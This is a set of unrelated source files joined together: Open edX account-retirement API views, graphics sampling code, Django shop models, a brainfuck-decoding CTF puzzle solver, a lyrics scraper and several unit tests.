        Deletes UserRetirementPartnerReportingStatus objects for a list of users
        that have been reported on.
        """
        usernames = [u['original_username'] for u in request.data]
        if not usernames:
            return Response('No original_usernames given.', status=status.HTTP_400_BAD_REQUEST)
        retirement_statuses = UserRetirementPartnerReportingStatus.objects.filter(
            is_being_processed=True,
            original_username__in=usernames
        )
        # During a narrow window learners were able to re-use a username that had been retired if
        # they altered the capitalization of one or more characters. Therefore we can have more
        # than one row returned above (due to our MySQL collation being case-insensitive), and need
        # to disambiguate them in Python, which will respect case in the comparison.
        retirement_statuses_clean = [rs for rs in retirement_statuses if rs.original_username in usernames]
        if len(usernames) != len(retirement_statuses_clean):
            # Count mismatch: some given username has no exact-case processing row (or vice versa).
            return Response(
                '{} original_usernames given, {} found!\n'
                'Given usernames:\n{}\n'
                'Found UserRetirementReportingStatuses:\n{}'.format(
                    len(usernames),
                    len(retirement_statuses_clean),
                    usernames,
                    ', '.join([rs.original_username for rs in retirement_statuses_clean])
                ),
                status=status.HTTP_400_BAD_REQUEST
            )
        # NOTE(review): this deletes the case-insensitive queryset, not the exact-case subset;
        # the count check above is assumed to guarantee they coincide — confirm.
        retirement_statuses.delete()
        return Response(status=status.HTTP_204_NO_CONTENT)
class AccountRetirementStatusView(ViewSet):
    """
    Provides API endpoints for managing the user retirement process.
    """
    authentication_classes = (JwtAuthentication,)
    permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
    parser_classes = (JSONParser,)
    serializer_class = UserRetirementStatusSerializer

    def retirement_queue(self, request):
        """
        GET /api/user/v1/accounts/retirement_queue/
        {'cool_off_days': 7, 'states': ['PENDING', 'COMPLETE']}
        Returns the list of RetirementStatus users in the given states that were
        created in the retirement queue at least `cool_off_days` ago.
        """
        try:
            cool_off_days = int(request.GET['cool_off_days'])
            if cool_off_days < 0:
                # NOTE(review): the message says "greater than 0" but the check permits 0
                # (no cool-off at all) — confirm which is intended.
                raise RetirementStateError('Invalid argument for cool_off_days, must be greater than 0.')
            states = request.GET.getlist('states')
            if not states:
                raise RetirementStateError('Param "states" required with at least one state.')
            state_objs = RetirementState.objects.filter(state_name__in=states)
            if state_objs.count() != len(states):
                # At least one requested state name has no RetirementState row.
                found = [s.state_name for s in state_objs]
                raise RetirementStateError(f'Unknown state. Requested: {states} Found: {found}')
            # Only rows created strictly before (now - cool_off_days) qualify.
            earliest_datetime = datetime.datetime.now(pytz.UTC) - datetime.timedelta(days=cool_off_days)
            retirements = UserRetirementStatus.objects.select_related(
                'user', 'current_state', 'last_state'
            ).filter(
                current_state__in=state_objs, created__lt=earliest_datetime
            ).order_by(
                'id'
            )
            serializer = UserRetirementStatusSerializer(retirements, many=True)
            return Response(serializer.data)
        # This should only occur on the int() conversion of cool_off_days at this point
        except ValueError:
            return Response('Invalid cool_off_days, should be integer.', status=status.HTTP_400_BAD_REQUEST)
        except KeyError as exc:
            return Response(f'Missing required parameter: {str(exc)}',
                            status=status.HTTP_400_BAD_REQUEST)
        except RetirementStateError as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)

    def retirements_by_status_and_date(self, request):
        """
        GET /api/user/v1/accounts/retirements_by_status_and_date/
        ?start_date=2018-09-05&end_date=2018-09-07&state=COMPLETE
        Returns a list of UserRetirementStatusSerializer serialized
        RetirementStatus rows in the given state that were created in the
        retirement queue between the dates given. Date range is inclusive,
        so to get one day you would set both dates to that day.
        """
        try:
            start_date = datetime.datetime.strptime(request.GET['start_date'], '%Y-%m-%d').replace(tzinfo=pytz.UTC)
            end_date = datetime.datetime.strptime(request.GET['end_date'], '%Y-%m-%d').replace(tzinfo=pytz.UTC)
            now = datetime.datetime.now(pytz.UTC)
            if start_date > now or end_date > now or start_date > end_date:
                raise RetirementStateError('Dates must be today or earlier, and start must be earlier than end.')
            # Add a day to make sure we get all the way to 23:59:59.999, this is compared "lt" in the query
            # not "lte".
            end_date += datetime.timedelta(days=1)
            state = request.GET['state']
            state_obj = RetirementState.objects.get(state_name=state)
            retirements = UserRetirementStatus.objects.select_related(
                'user', 'current_state', 'last_state'
            ).filter(
                current_state=state_obj, created__lt=end_date, created__gte=start_date
            ).order_by(
                'id'
            )
            serializer = UserRetirementStatusSerializer(retirements, many=True)
            return Response(serializer.data)
        # This should only occur on the datetime conversion of the start / end dates.
        except ValueError as exc:
            return Response(f'Invalid start or end date: {str(exc)}', status=status.HTTP_400_BAD_REQUEST)
        except KeyError as exc:
            return Response(f'Missing required parameter: {str(exc)}',
                            status=status.HTTP_400_BAD_REQUEST)
        except RetirementState.DoesNotExist:
            return Response('Unknown retirement state.', status=status.HTTP_400_BAD_REQUEST)
        except RetirementStateError as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)

    def retrieve(self, request, username):  # pylint: disable=unused-argument
        """
        GET /api/user/v1/accounts/{username}/retirement_status/
        Returns the RetirementStatus of a given user, or 404 if that row
        doesn't exist.
        """
        try:
            # Helper resolves the User for active and already-retired username forms (per its name).
            user = get_potentially_retired_user_by_username(username)
            retirement = UserRetirementStatus.objects.select_related(
                'user', 'current_state', 'last_state'
            ).get(user=user)
            serializer = UserRetirementStatusSerializer(instance=retirement)
            return Response(serializer.data)
        except (UserRetirementStatus.DoesNotExist, User.DoesNotExist):
            return Response(status=status.HTTP_404_NOT_FOUND)

    @request_requires_username
    def partial_update(self, request):
        """
        PATCH /api/user/v1/accounts/update_retirement_status/
        ```
        {
            'username': 'user_to_retire',
            'new_state': 'LOCKING_COMPLETE',
            'response': 'User account locked and logged out.'
        }
        ```
        Updates the RetirementStatus row for the given user to the new
        status, and append any messages to the message log.
        Note that this implementation DOES NOT use the "merge patch"
        implementation seen in AccountViewSet. Slumber, the project
        we use to power edx-rest-api-client, does not currently support
        it. The content type for this request is 'application/json'.
        """
        try:
            username = request.data['username']
            retirements = UserRetirementStatus.objects.filter(original_username=username)
            # During a narrow window learners were able to re-use a username that had been retired if
            # they altered the capitalization of one or more characters. Therefore we can have more
            # than one row returned here (due to our MySQL collation being case-insensitive), and need
            # to disambiguate them in Python, which will respect case in the comparison.
            retirement = None
            if len(retirements) < 1:  # lint-amnesty, pylint: disable=no-else-raise
                raise UserRetirementStatus.DoesNotExist()
            elif len(retirements) >= 1:
                # Pick the row whose stored username matches exactly (case-sensitive).
                for r in retirements:
                    if r.original_username == username:
                        retirement = r
                        break
                # UserRetirementStatus was found, but it was the wrong case.
                if retirement is None:
                    raise UserRetirementStatus.DoesNotExist()
            retirement.update_state(request.data)
            return Response(status=status.HTTP_204_NO_CONTENT)
        except UserRetirementStatus.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except RetirementStateError as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
        except Exception as exc:  # pylint: disable=broad-except
            return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)

    def cleanup(self, request):
        """
        POST /api/user/v1/accounts/retirement_cleanup/
        ```
        {
            'usernames': ['user1', 'user2', ...]
        }
        ```
        Deletes a batch of retirement requests by username.
        """
        try:
            usernames = request.data['usernames']
            if not isinstance(usernames, list):
                raise TypeError('Usernames should be an array.')
            complete_state = RetirementState.objects.get(state_name='COMPLETE')
            retirements = UserRetirementStatus.objects.filter(
                original_username__in=usernames,
                current_state=complete_state
            )
            # Sanity check that they're all valid usernames in the right state
            if len(usernames) != len(retirements):
                raise UserRetirementStatus.DoesNotExist('Not all usernames exist in the COMPLETE state.')
            retirements.delete()
            return Response(status=status.HTTP_204_NO_CONTENT)
        except (RetirementStateError, UserRetirementStatus.DoesNotExist, TypeError) as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
        except Exception as exc:  # pylint: disable=broad-except
            return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class LMSAccountRetirementView(ViewSet):
    """
    Provides an API endpoint for retiring a user in the LMS.
    """
    authentication_classes = (JwtAuthentication,)
    permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
    parser_classes = (JSONParser,)

    @request_requires_username
    def post(self, request):
        """
        POST /api/user/v1/accounts/retire_misc/
        ```
        {
            'username': 'user_to_retire'
        }
        ```
        Retires the user with the given username in the LMS.
        """
        username = request.data['username']
        try:
            retirement = UserRetirementStatus.get_retirement_for_retirement_action(username)
            # Scrub this user's PII from the various LMS models, one subsystem at a time.
            RevisionPluginRevision.retire_user(retirement.user)
            ArticleRevision.retire_user(retirement.user)
            PendingNameChange.delete_by_user_value(retirement.user, field='user')
            ManualEnrollmentAudit.retire_manual_enrollments(retirement.user, retirement.retired_email)
            CreditRequest.retire_user(retirement)
            ApiAccessRequest.retire_user(retirement.user)
            CreditRequirementStatus.retire_user(retirement)
            # This signal allows code in higher points of LMS to retire the user as necessary
            USER_RETIRE_LMS_MISC.send(sender=self.__class__, user=retirement.user)
            # This signal allows code in higher points of LMS to unsubscribe the user
            # from various types of mailings.
            USER_RETIRE_MAILINGS.send(
                sender=self.__class__,
                email=retirement.original_email,
                new_email=retirement.retired_email,
                user=retirement.user
            )
        except UserRetirementStatus.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except RetirementStateError as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
        except Exception as exc:  # pylint: disable=broad-except
            return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        # Success path: everything above completed without raising.
        return Response(status=status.HTTP_204_NO_CONTENT)
class AccountRetirementView(ViewSet):
    """
    Provides API endpoint for retiring a user.
    """
    authentication_classes = (JwtAuthentication,)
    permission_classes = (permissions.IsAuthenticated, CanRetireUser,)
    parser_classes = (JSONParser,)

    @request_requires_username
    def post(self, request):
        """
        POST /api/user/v1/accounts/retire/
        ```
        {
            'username': 'user_to_retire'
        }
        ```
        Retires the user with the given username. This includes
        retiring this username, the associated email address, and
        any other PII associated with this user.
        """
        username = request.data['username']
        try:
            retirement_status = UserRetirementStatus.get_retirement_for_retirement_action(username)
            user = retirement_status.user
            # Prefer values already recorded on the status row; fall back to deriving them.
            retired_username = retirement_status.retired_username or get_retired_username_by_username(username)
            retired_email = retirement_status.retired_email or get_retired_email_by_email(user.email)
            original_email = retirement_status.original_email
            # Retire core user/profile information
            self.clear_pii_from_userprofile(user)
            self.delete_users_profile_images(user)
            self.delete_users_country_cache(user)
            # Retire data from Enterprise models
            self.retire_users_data_sharing_consent(username, retired_username)
            self.retire_sapsf_data_transmission(user)
            self.retire_degreed_data_transmission(user)
            self.retire_user_from_pending_enterprise_customer_user(user, retired_email)
            self.retire_entitlement_support_detail(user)
            # Retire misc. models that may contain PII of this user
            PendingEmailChange.delete_by_user_value(user, field='user')
            UserOrgTag.delete_by_user_value(user, field='user')
            # Retire any objects linked to the user via their original email
            CourseEnrollmentAllowed.delete_by_user_value(original_email, field='email')
            UnregisteredLearnerCohortAssignments.delete_by_user_value(original_email, field='email')
            # This signal allows code in higher points of LMS to retire the user as necessary
            USER_RETIRE_LMS_CRITICAL.send(sender=self.__class__, user=user)
            # Finally scrub and deactivate the Django auth user itself.
            user.first_name = ''
            user.last_name = ''
            user.is_active = False
            user.username = retired_username
            user.save()
        except UserRetirementStatus.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except RetirementStateError as exc:
            return Response(str(exc), status=status.HTTP_400_BAD_REQUEST)
        except Exception as exc:  # pylint: disable=broad-except
            return Response(str(exc), status=status.HTTP_500_INTERNAL_SERVER_ERROR)
        return Response(status=status.HTTP_204_NO_CONTENT)

    @staticmethod
    def clear_pii_from_userprofile(user):
        """
        For the given user, sets all of the user's profile fields to some retired value.
        This also deletes all ``SocialLink`` objects associated with this user's profile.
        """
        for model_field, value_to_assign in USER_PROFILE_PII.items():
            setattr(user.profile, model_field, value_to_assign)
        user.profile.save()
        user.profile.social_links.all().delete()

    @staticmethod
    def delete_users_profile_images(user):
        # Clear the "has profile image" flag, then remove every stored image name.
        set_has_profile_image(user.username, False)
        names_of_profile_images = get_profile_image_names(user.username)
        remove_profile_images(names_of_profile_images)

    @staticmethod
    def delete_users_country_cache(user):
        # Drop the cached country value keyed on this user's id.
        cache_key = UserProfile.country_cache_key_name(user.id)
        cache.delete(cache_key)

    @staticmethod
    def retire_users_data_sharing_consent(username, retired_username):
        # Rewrite consent rows so they reference the retired username instead of the real one.
        DataSharingConsent.objects.filter(username=username).update(username=retired_username)

    @staticmethod
    def retire_sapsf_data_transmission(user):  # lint-amnesty, pylint: disable=missing-function-docstring
        # Blank the SAP SuccessFactors user id on every transmission audit for this user.
        for ent_user in EnterpriseCustomerUser.objects.filter(user_id=user.id):
            for enrollment in EnterpriseCourseEnrollment.objects.filter(
                enterprise_customer_user=ent_user
            ):
                audits = SapSuccessFactorsLearnerDataTransmissionAudit.objects.filter(
                    enterprise_course_enrollment_id=enrollment.id
                )
                audits.update(sapsf_user_id='')

    @staticmethod
    def retire_degreed_data_transmission(user):  # lint-amnesty, pylint: disable=missing-function-docstring
        # Blank the Degreed email on every transmission audit for this user.
        for ent_user in EnterpriseCustomerUser.objects.filter(user_id=user.id):
            for enrollment in EnterpriseCourseEnrollment.objects.filter(
                enterprise_customer_user=ent_user
            ):
                audits = DegreedLearnerDataTransmissionAudit.objects.filter(
                    enterprise_course_enrollment_id=enrollment.id
                )
                audits.update(degreed_user_email='')

    @staticmethod
    def retire_user_from_pending_enterprise_customer_user(user, retired_email):
        # Replace the email on any pending enterprise linkage with the retired address.
        PendingEnterpriseCustomerUser.objects.filter(user_email=user.email).update(user_email=retired_email)

    @staticmethod
    def retire_entitlement_support_detail(user):
        """
        Updates all CourseEntitleSupportDetail records for the given
        user to have an empty ``comments`` field.
        """
        for entitlement in CourseEntitlement.objects.filter(user_id=user.id):
            entitlement.courseentitlementsupportdetail_set.all().update(comments='')
class UsernameReplacementView(APIView):
    """
    WARNING: This API is only meant to be used as part of a larger job that
    updates usernames across all services. DO NOT run this alone or users will
    not match across the system and things will be broken.
    API will receive a list of current usernames and their requested new
    username. If their new username is taken, it will randomly assign a new username.
    This API will be called first, before calling the APIs in other services as this
    one handles the checks on the usernames provided.
    """
    authentication_classes = (JwtAuthentication, )
    permission_classes = (permissions.IsAuthenticated, CanReplaceUsername)

    def post(self, request):
        """
        POST /api/user/v1/accounts/replace_usernames/
        ```
        {
            "username_mappings": [
                {"current_username_1": "desired_username_1"},
                {"current_username_2": "desired_username_2"}
            ]
        }
        ```
        **POST Parameters**
        A POST request must include the following parameter.
        * username_mappings: Required. A list of objects that map the current username (key)
          to the desired username (value)
        **POST Response Values**
        As long as data validation passes, the request will return a 200 with a new mapping
        of old usernames (key) to new username (value)
        ```
        {
            "successful_replacements": [
                {"old_username_1": "new_username_1"}
            ],
            "failed_replacements": [
                {"old_username_2": "new_username_2"}
            ]
        }
        ```
        """
        # (model_name, column_name) pairs whose username columns must stay in sync.
        MODELS_WITH_USERNAME = (
            ('auth.user', 'username'),
            ('consent.DataSharingConsent', 'username'),
            ('consent.HistoricalDataSharingConsent', 'username'),
            ('credit.CreditEligibility', 'username'),
            ('credit.CreditRequest', 'username'),
            ('credit.CreditRequirementStatus', 'username'),
            ('user_api.UserRetirementPartnerReportingStatus', 'original_username'),
            ('user_api.UserRetirementStatus', 'original_username')
        )
        UNIQUE_SUFFIX_LENGTH = getattr(settings, 'SOCIAL_AUTH_UUID_LENGTH', 4)
        username_mappings = request.data.get("username_mappings")
        replacement_locations = self._load_models(MODELS_WITH_USERNAME)
        if not self._has_valid_schema(username_mappings):
            raise ValidationError("Request data does not match schema")
        successful_replacements, failed_replacements = [], []
        for username_pair in username_mappings:
            # Each mapping is a single-entry dict: {current_username: desired_username}.
            current_username = list(username_pair.keys())[0]
            desired_username = list(username_pair.values())[0]
            new_username = self._generate_unique_username(desired_username, suffix_length=UNIQUE_SUFFIX_LENGTH)
            successfully_replaced = self._replace_username_for_all_models(
                current_username,
                new_username,
                replacement_locations
            )
            if successfully_replaced:
                successful_replacements.append({current_username: new_username})
            else:
                failed_replacements.append({current_username: new_username})
        return Response(
            status=status.HTTP_200_OK,
            data={
                "successful_replacements": successful_replacements,
                "failed_replacements": failed_replacements
            }
        )

    def _load_models(self, models_with_fields):
        """ Takes tuples that contain a model path and returns the list with a loaded version of the model """
        try:
            replacement_locations = [(apps.get_model(model), column) for (model, column) in models_with_fields]
        except LookupError:
            log.exception("Unable to load models for username replacement")
            raise
        return replacement_locations

    def _has_valid_schema(self, post_data):
        """ Verifies the data is a list of objects with a single key:value pair """
        if not isinstance(post_data, list):
            return False
        for obj in post_data:
            if not (isinstance(obj, dict) and len(obj) == 1):
                return False
        return True

    def _generate_unique_username(self, desired_username, suffix_length=4):
        """
        Generates a unique username.
        If the desired username is available, that will be returned.
        Otherwise it will generate unique suffixes to the desired username until it is an available username.
        """
        new_username = desired_username
        # Keep checking usernames in case desired_username + random suffix is already taken
        while True:
            if User.objects.filter(username=new_username).exists():
                unique_suffix = uuid.uuid4().hex[:suffix_length]
                new_username = desired_username + unique_suffix
            else:
                break
        return new_username

    def _replace_username_for_all_models(self, current_username, new_username, replacement_locations):
        """
        Replaces current_username with new_username for all (model, column) pairs in replacement locations.
        Returns if it was successful or not. Will return successful even if no matching
        TODO: Determine if logs of username are a PII issue.
        """
        model = None  # so the except-handler can log even if the failure precedes the loop
        try:
            with transaction.atomic():
                num_rows_changed = 0
                for (model, column) in replacement_locations:
                    num_rows_changed += model.objects.filter(
                        **{column: current_username}
                    ).update(
                        **{column: new_username}
                    )
        except Exception as exc:  # pylint: disable=broad-except
            log.exception(
                "Unable to change username from %s to %s. Failed on table %s because %s",
                current_username,
                new_username,
                # BUG FIX: `model` is already a class, so `model.__class__.__name__` logged the
                # metaclass name (e.g. 'ModelBase') instead of the failing model's name.
                model.__name__ if model is not None else "<none>",
                exc
            )
            return False
        if num_rows_changed == 0:
            log.info(
                "Unable to change username from %s to %s because %s doesn't exist.",
                current_username,
                new_username,
                current_username,
            )
        else:
            log.info(
                "Successfully changed username from %s to %s.",
                current_username,
                new_username,
            )
        return True
| StarcoderdataPython |
127602 | # Copyright (c) 2020 BlenderNPR and contributors. MIT license.
import math
#Rotated Grid Super Sampling pattern
def get_RGSS_samples(grid_size):
    """Return grid_size**2 sample offsets laid out on a rotated grid.

    Each grid point is mapped to the -1..+1 square, rotated by atan(1/2),
    and its x component is rescaled by sqrt(5)/2.
    NOTE(review): only x is rescaled — verify that this asymmetry is intended.
    """
    theta = math.atan(1 / 2)
    sin_t = math.sin(theta)
    cos_t = math.cos(theta)
    x_scale = math.sqrt(5) / 2
    samples = []
    for col in range(grid_size):
        for row in range(grid_size):
            u = (col / grid_size) * 2.0 - 1.0  # map column to -1..+1
            v = (row / grid_size) * 2.0 - 1.0  # map row to -1..+1
            rotated_x = u * cos_t - v * sin_t
            rotated_y = u * sin_t + v * cos_t
            rotated_x *= x_scale
            samples.append((rotated_x, rotated_y))
    # TODO: Reorder (carried over from the original implementation)
    return samples
| StarcoderdataPython |
108138 | <reponame>ysenarath/opinion-lab
# Top-level CLI usage text printed by the `oplab` entry point.
COMMAND_HELP = '''
oplab <command> [<args>]
'''
# Usage text for the train subcommand (`t` or `train`).
TRAIN_COMMAND_HELP = '''
oplab t|train
--params <params_file_path>
--output <model_save_path>
'''
| StarcoderdataPython |
3284865 | <gh_stars>1-10
#!/usr/bin/env python3
import os, sys, signal, itertools
# Load the obfuscated "chungus" program text. Using `with` closes the file
# handle promptly (the original left it open until interpreter shutdown).
with open("chungus.txt") as _chungus_file:
    chungus = _chungus_file.read()
# Candidate tokens: some permutation of these seven words maps onto the seven
# brainfuck operators "+-><.[]" (tried exhaustively below).
chars = ('chunga', 'chunky', 'karen', 'big', 'fudd', 'chungus', 'ricardo')
def replace(A, B, C):
    """Return A with each element of B replaced, in order, by its pair in C.

    Replacements are applied sequentially, so a later substitution can act on
    text produced by an earlier one.
    """
    result = A
    for old, new in zip(B, C):
        result = result.replace(old, new)
    return result
def signal_handler(signum, frame):
    """SIGALRM handler: abort the current interpreter run by raising.

    The raised exception unwinds into the enclosing try/except around the
    brainfuck loop, which treats it as a per-permutation timeout.
    """
    raise Exception("timeout")
signal.signal(signal.SIGALRM, signal_handler)
# Try every permutation of the candidate words as a mapping onto the seven
# brainfuck operators, run the resulting program, and stop when its output
# contains the flag marker "HackTrinity".
for counter, p in enumerate(itertools.permutations(chars)):
    # Progress indicator: a dot per attempt, a count every 100 attempts.
    if not (counter + 1) % 100:
        print("\n", counter + 1)
    else:
        print(".", end="")
        sys.stdout.flush()
    bf = replace(chungus, p, "+-><.[]")
    output = ""
    pos = 0 # Instruction
    array = {0:0} # Cells
    current = 0 # Current cell, incremented with '>' and decremented with '<'
    signal.alarm(2) # Timeout of 2 seconds
    try:
        while pos < len(bf):
            # Current instruction
            inst = bf[pos]
            # Increment pointer
            if inst == "+":
                if current not in array:
                    array[current] = 1
                else:
                    array[current] += 1
                array[current] %= 256 # Wrap around the ASCII table
            # Decrement pointer
            elif inst == "-":
                if current not in array:
                    array[current] = -1
                else:
                    array[current] -= 1
                array[current] %= 256 # Wrap around the ASCII table
            # Next cell
            elif inst == ">":
                current += 1
                if current not in array:
                    array[current] = 0
            # Previous cell
            elif inst == "<":
                current -= 1
                if current not in array:
                    array[current] = 0
            # Output ASCII character of cell value
            elif inst == ".":
                #sys.stdout.write(chr(array[current]))
                output += chr(array[current])
            # Start loop: on zero, jump forward past the matching ']'
            elif inst == "[":
                if array[current] == 0:
                    loops = 1
                    while loops:
                        pos += 1
                        if bf[pos] == "[":
                            loops += 1
                        elif bf[pos] == "]":
                            loops -= 1
            # End loop: scan back to the matching '[' (re-executed next pass)
            elif inst == "]":
                loops = 1
                while loops:
                    pos -= 1
                    if bf[pos] == "[":
                        loops -= 1
                    elif bf[pos] == "]":
                        loops += 1
                pos -= 1
            pos += 1
        # NOTE(review): the alarm is not cancelled on clean completion; a pending
        # SIGALRM could fire during the next iteration's setup — confirm harmless.
        if "HackTrinity" in output:
            exit("\n" + output)
    except Exception:
        signal.alarm(0) # Reset timeout
    # NOTE(review): unreachable — NameError is a subclass of Exception and is
    # already caught by the clause above.
    except NameError:
        pass
| StarcoderdataPython |
3257971 | from maggma.api import query_operator
from emmet.api.routes.dielectric.query_operators import DielectricQuery
from monty.tempfile import ScratchDir
from monty.serialization import loadfn, dumpfn
def test_dielectric_query_operator():
    """DielectricQuery: check generated Mongo criteria and JSON round-trip."""
    op = DielectricQuery()
    q = op.query(
        e_total_min=0,
        e_total_max=5,
        e_electronic_min=0,
        e_electronic_max=5,
        e_ionic_min=0,
        e_ionic_max=5,
        n_min=0,
        n_max=5,
    )
    fields = [
        "e_total",
        "e_ionic",
        "e_electronic",
        "n",
    ]
    # Each min/max pair must become a {$gte, $lte} range on its field.
    assert q == {"criteria": {field: {"$gte": 0, "$lte": 5} for field in fields}}
    # The operator must behave identically after a JSON (de)serialization round trip.
    with ScratchDir("."):
        dumpfn(op, "temp.json")
        new_op = loadfn("temp.json")
        q = new_op.query(
            e_total_min=0,
            e_total_max=5,
            e_electronic_min=0,
            e_electronic_max=5,
            e_ionic_min=0,
            e_ionic_max=5,
            n_min=0,
            n_max=5,
        )
        assert dict(q) == {
            "criteria": {field: {"$gte": 0, "$lte": 5} for field in fields}
        }
| StarcoderdataPython |
3371707 | from django.db import models
# Create your models here.
class Product(models.Model):
    """Catalog item offered by the shop."""
    # TODO: creating fulldesc and short desc
    product_no = models.IntegerField(default=1)
    product_name = models.CharField(max_length=50)
    category = models.CharField(max_length=50, default="")
    sub_category = models.CharField(max_length=50, default="")
    product_desc = models.CharField(max_length=300)
    # NOTE(review): integer price — currency unit / decimal handling unverified.
    price = models.IntegerField(default=0)
    pub_date = models.DateTimeField()
    product_image = models.ImageField(upload_to="shop/img", default="")

    def __str__(self):
        return self.product_name
class Contact(models.Model):
    """Message submitted through the site's contact form."""
    name = models.CharField(max_length=50)
    email = models.CharField(max_length=70)
    phone = models.IntegerField()
    desc = models.TextField(max_length=700)
    pub_date = models.DateTimeField()

    def __str__(self):
        return self.name
class Order(models.Model):
    """A placed order: cart contents, shipping details and payment state."""
    # Presumably a JSON-encoded cart snapshot (name suggests so) — confirm with the writer.
    itemsJson = models.CharField(max_length=100000)
    customerName = models.CharField(max_length=100)
    customerEmail = models.CharField(max_length=200)
    customerPhone = models.IntegerField()
    customerAddress = models.CharField(max_length=400)
    customerCity = models.CharField(max_length=100)
    customerState = models.CharField(max_length=100)
    customerZipCode = models.CharField(max_length=10)
    orderDate = models.DateTimeField()
    # Payment-gateway tracking: transaction id and whether payment succeeded.
    payment_id = models.CharField(default="", max_length=1000)
    payment_status = models.BooleanField(default=False)
    amount = models.IntegerField(default=0)

    def __str__(self):
        return self.customerName
class OrderUpdate(models.Model):
    """Free-text status update attached (by integer id) to an Order."""
    # NOTE(review): plain IntegerField with a string default, not a ForeignKey
    # to Order — confirm both choices are intentional.
    order_id = models.IntegerField(default="")
    orderUpdateDesc = models.CharField(max_length=5000, default="")
    updateTimeStamp = models.DateTimeField()

    def __str__(self):
        # Short preview of the update text (the source line had dataset residue
        # fused onto it, which made it a syntax error as extracted).
        return self.orderUpdateDesc[:10] + "..."
7216 | import io
from PIL import Image as PILImage
from sqlalchemy import Column, ForeignKey, LargeBinary, Index, Integer, String
from resources.models.ModelBase import Base
class Image(Base):
    """Artwork image stored inline or referenced by URL, with a dedup hash."""
    # If this is used then the image is stored in the database
    image = Column(LargeBinary(length=16777215), default=None)
    # If this is used then the image is remote and this is the url
    url = Column(String(500))
    caption = Column(String(100))
    # This is a PhotoHash of the image for assistance in deduping
    signature = Column(String(50))
    artistId = Column(Integer, ForeignKey("artist.id"), index=True)
    releaseId = Column(Integer, ForeignKey("release.id"), index=True)

    def averageHash(self):
        """Return an average-hash hex string of the stored image bytes, or None on failure."""
        try:
            hash_size = 8
            # Open the image, resize it and convert it to black & white.
            image = PILImage.open(io.BytesIO(self.image)).resize((hash_size, hash_size), PILImage.ANTIALIAS).convert(
                'L')
            pixels = list(image.getdata())
            # Compute the hash based on each pixels value compared to the average.
            avg = sum(pixels) / len(pixels)
            bits = "".join(map(lambda pixel: '1' if pixel > avg else '0', pixels))
            hashformat = "0{hashlength}x".format(hashlength=hash_size ** 2 // 4)
            return int(bits, 2).__format__(hashformat)
        except Exception:
            # Missing/corrupt image bytes make decoding fail; the hash is best-effort,
            # so report "no hash" rather than propagate. (Was a bare `except:`, which
            # also swallowed SystemExit/KeyboardInterrupt.)
            return None

    def __unicode__(self):
        return self.caption

    def __str__(self):
        return self.caption or self.signature
| StarcoderdataPython |
3314421 | <filename>lyrics/chartlyrics.py<gh_stars>1-10
"""
chartlyrics
Gets the lyrics for a song using the chartlyrics website
@category silly
@version $ID: 1.1.1, 2015-06-30 17:00:00 CST $;
@author KMR
@licence GNU GPL v.3
"""
__version__ = "1.1.1"
import requests
from bs4 import BeautifulSoup
class chartlyrics:
config = None
def __init__(self, conf):
self.config = conf
print "chartlyrics initialised successfully"
def getLyrics(self, artist, song):
# build a payload for the get params
payload = {'artist': artist, 'song': song}
# request the xml
r = requests.get(self.config['url'], params=payload)
# make it into a soup
soup = BeautifulSoup(r.text, "xml")
# get the bit we actually want
lyrics = soup.GetLyricResult.Lyric.text | StarcoderdataPython |
1625583 | <filename>test/matrix/test_named_matrix.py
import unittest
import collections
import time
import bspump
import bspump.matrix
import bspump.unittest
class TestNamedMatrix(bspump.unittest.TestCase):
    """Unit tests for bspump.matrix.NamedMatrix row management and flushing."""

    def test_matrix_zeros(self):
        # A freshly zeroed matrix has an empty array and empty name<->index maps.
        matrix = bspump.matrix.NamedMatrix(
            app = self.App,
            dtype = "int_")
        matrix.zeros()
        self.assertEqual(matrix.Array.shape, (0,))
        self.assertEqual(len(matrix.N2IMap), 0)
        self.assertEqual(len(matrix.I2NMap), 0)

    def test_matrix_flush(self):
        # Closing rows 0-39 and flushing must compact the array to the surviving
        # 60 rows, preserving their values and order.
        matrix = bspump.matrix.NamedMatrix(app=self.App)
        n = 100
        indexes = []
        for i in range(n):
            index = matrix.add_row(str(i))
            indexes.append(index)
            matrix.Array[index] = i
        # Snapshot of the rows expected to survive the flush.
        check_array = matrix.Array[40:100]
        for i in range(0, 40):
            matrix.close_row(i)
        matrix.flush()
        self.assertEqual(matrix.Array.shape, (n - 40,))
        self.assertEqual(len(matrix.N2IMap), n - 40)
        self.assertEqual(len(matrix.I2NMap), n - 40)
        self.assertEqual(len(check_array), len(matrix.Array))
        for i in range(len(check_array)):
            self.assertEqual(check_array[i], matrix.Array[i])

    def test_matrix_add_row(self):
        # add_row must maintain both the name->index and index->name maps.
        matrix = bspump.matrix.NamedMatrix(app=self.App)
        n = 100
        n2i = collections.OrderedDict()
        i2n = collections.OrderedDict()
        for i in range(n):
            name = "id_" + str(i)
            index = matrix.add_row(name)
            n2i[name] = index
            i2n[index] = name
        self.assertEqual(n2i, matrix.N2IMap)
        self.assertEqual(i2n, matrix.I2NMap)

    def test_matrix_close_row(self):
        # Closed rows disappear from I2NMap and the two maps stay the same size.
        matrix = bspump.matrix.NamedMatrix(app=self.App)
        n = 100
        for i in range(n):
            index = matrix.add_row(str(i))
        for i in range(0, 5):
            matrix.close_row(i)
            self.assertNotIn(i, matrix.I2NMap)
        self.assertEqual(len(matrix.I2NMap), len(matrix.N2IMap))

    def test_matrix_get_row_index(self):
        # get_row_index must return the index that add_row assigned.
        matrix = bspump.matrix.NamedMatrix(app=self.App)
        n = 100
        for i in range(n):
            name = "id_" + str(i)
            index = matrix.add_row(name)
            index_obtained = matrix.get_row_index(name)
            self.assertEqual(i, index_obtained)

    def test_matrix_get_row_name(self):
        # get_row_name is the inverse of add_row's name->index assignment.
        matrix = bspump.matrix.NamedMatrix(app=self.App)
        n = 100
